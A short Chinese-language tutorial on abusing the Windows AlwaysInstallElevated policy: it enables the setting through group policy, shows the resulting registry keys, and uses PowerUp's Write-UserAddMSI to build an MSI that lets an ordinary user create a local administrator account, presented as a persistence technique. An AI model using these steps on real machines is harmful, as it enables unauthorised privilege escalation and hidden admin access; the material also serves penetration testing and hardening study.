目录

讲在前面

一、修改组策略，开启AlwaysInstallElevated特权安装功能：

二、使用powerup生成msi

三、在主机上以普通用户运行UserAdd.msi即可创建本地administrator账户

---

讲在前面

当前域组策略可被修改。一般此漏洞用作权限维持

一、修改组策略，开启AlwaysInstallElevated特权安装功能：

计算机配置-策略-管理模板-Windows组件-Windows Installer-始终以提升的权限进行安装：选择启用用户配置-策略-管理模板-Windows组件-Windows Installer-始终以提升的权限进行安装：选择启用

注意：

实验过程可以强制更新组策略，一般情况需要等待下一次更新时间更新组策略-gpupdate /force 强制更新组策略修改完后注册表内有如下两处新键值 [HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer] "AlwaysInstallElevated"=dword:00000001[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] "AlwaysInstallElevated"=dword:00000001

二、使用powerup生成msi

检查是否开启AlwaysInstallElevated： Get-RegistryAlwaysInstallElevated     ///返回true代表系统开启AlwaysInstallElevated利用AlwaysInstallElevated添加用户：Write-UserAddMSI      ///运行后生成文件UserAdd.msi

三、在主机上以普通用户运行UserAdd.msi即可创建本地administrator账户